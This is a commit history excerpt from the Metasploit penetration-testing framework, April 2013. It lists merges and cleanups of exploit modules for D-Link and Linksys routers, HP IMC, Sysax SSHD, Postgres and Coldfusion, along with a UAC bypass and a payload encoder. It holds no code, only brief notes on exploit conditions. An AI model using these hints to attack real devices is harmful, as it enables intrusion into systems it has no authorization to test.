[Closes #1223 ]
2013-04-10 12:14:52 -05:00
James Lee
6c980981db
Break up long lines and add magic encoding comment
2013-04-10 09:28:45 -05:00
jvazquez-r7
a1605184ed
Landing #1719 , @m-1-k-3 dlink_diagnostic_exec_noauth exploit module
2013-04-10 11:17:29 +02:00
jvazquez-r7
4f2e3f0339
final cleanup for dlink_diagnostic_exec_noauth
2013-04-10 11:15:32 +02:00
m-1-k-3
8fbade4cbd
OSVDB
2013-04-10 10:45:30 +02:00
Tod Beardsley
2d09aa2a91
Landing #1709 .
2013-04-09 10:55:21 -05:00
sinn3r
76d4538d2a
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-04-09 10:24:54 -05:00
sinn3r
1e258170dc
It's a filename, so not trying to match any single char
2013-04-09 10:20:52 -05:00
sinn3r
50cf039170
Merge branch 'cve-2013-1899-not-auth' of github.com:jhart-r7/metasploit-framework into jhart-r7-cve-2013-1899-not-auth
2013-04-09 10:19:15 -05:00
Tod Beardsley
65e5ed8950
Merge #1716 , version checker fix for UAC bypass
2013-04-09 09:00:30 -05:00
Tod Beardsley
ba86e14d43
Whitespace and caps fixes
2013-04-09 08:57:53 -05:00
jvazquez-r7
157f25788b
final cleanup for linksys_wrt54gl_apply_exec
2013-04-09 12:39:57 +02:00
jvazquez-r7
b090495ffb
Landing pr #1703 , m-1-k-3's linksys_wrt54gl_apply_exec exploit
2013-04-09 12:38:49 +02:00
m-1-k-3
b93ba58d79
EDB, BID
2013-04-09 11:56:53 +02:00
HD Moore
e2b8d5ed23
Fix from David Kennedy, enable Windows 8 support
2013-04-09 02:07:40 -05:00
James Lee
a2d6f7bb17
Landing #1714 - Don't bomb out if there are no wireless interfaces
...
No redmine ticket reported.
2013-04-08 17:17:47 -05:00
root
f369584bbd
Timeout added
2013-04-08 23:32:07 +02:00
m-1-k-3
cbefc44a45
correct waiting
2013-04-08 21:40:50 +02:00
jvazquez-r7
225342ce8f
final cleanup for sysax_sshd_kexchange
2013-04-08 20:28:37 +02:00
jvazquez-r7
5bc454035c
Merge remote-tracking branch 'origin/pr/1710' into landing-pr1710
2013-04-08 20:20:11 +02:00
Melih SARICA
e48cea432c
added add_sub encoder for x86 payloads
2013-04-08 20:51:39 +03:00
Jon Hart
b1152d1567
Improve Postgres CVE-2013-1899 to detect unauthorized connections
2013-04-08 09:55:23 -07:00
sinn3r
d24371eaff
Merge branch 'hp_imc_reportimgservlt_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_reportimgservlt_traversal
2013-04-08 10:18:30 -05:00
sinn3r
1b5c34db1a
Merge branch 'hp_imc_ictdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_ictdownloadservlet_traversal
2013-04-08 10:17:19 -05:00
sinn3r
11253c8f3e
Merge branch 'hp_imc_faultdownloadservlet_traversal' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-hp_imc_faultdownloadservlet_traversal
2013-04-08 10:16:52 -05:00
Matt Andreko
f96baa7e7e
Code Review Feedback
...
made the CLIENTVERSION always include the "SSH-2.0-OpenSSH_5.1p1 " to trigger DoS
2013-04-08 10:58:35 -04:00
Matt Andreko
4c8e19ad1a
Added reference
...
Removed final debug print statement
2013-04-08 08:28:53 -04:00
Jon Hart
8a98b1af4a
Added command mode, plus fixed the dropping of payloads
2013-04-07 15:39:38 -07:00
m-1-k-3
955efc7009
final cleanup
2013-04-07 17:59:57 +02:00
m-1-k-3
9f89a996b2
final regex, dhcp check and feedback from juan
2013-04-07 17:57:18 +02:00
jvazquez-r7
0e69edc89e
fixing use of regex
2013-04-07 11:39:29 +02:00
Jon Hart
f482496795
Initial commit of an exploit module for the CVEs covered by APSB13-03.
...
Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
2013-04-06 20:08:50 -07:00
jvazquez-r7
6a410d984d
adding get_config where I forgot
2013-04-06 19:13:42 +02:00
jvazquez-r7
0c25ffb4de
Landing #1695 , agix's smhstart local root exploit
2013-04-06 17:32:12 +02:00
jvazquez-r7
55302ee07f
Merge remote-tracking branch 'origin/pr/1695' into landing-pr1695
2013-04-06 17:30:02 +02:00
jvazquez-r7
9a2f409974
first cleanup for linksys_wrt54gl_apply_exec
2013-04-06 01:05:09 +02:00
m-1-k-3
ecaaaa34bf
dlink diagnostic - initial commit
2013-04-05 19:56:15 +02:00
jvazquez-r7
daba48035d
fix DEPTH description and basename
2013-04-05 11:05:46 +02:00
jvazquez-r7
b6edad1f1d
fix DEPTH description and basename
2013-04-05 11:04:43 +02:00
jvazquez-r7
d163e96d6a
fix DEPTH description and basename
2013-04-05 11:02:59 +02:00
James Lee
ad46b46684
Landing #1463 , Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
jvazquez-r7
30f44c3a24
final cleanup for dlink_dir_615h_http_login
2013-04-04 22:02:45 +02:00
jvazquez-r7
8f60d12e46
Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_login_dir_615H
2013-04-04 22:01:49 +02:00
jvazquez-r7
7d1e9af728
final cleanup for dlink_dir_session_cgi_http_login
2013-04-04 21:41:42 +02:00
jvazquez-r7
0b9fe53919
module filename changed
2013-04-04 21:41:10 +02:00
jvazquez-r7
6ec6638568
Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
2013-04-04 21:40:21 +02:00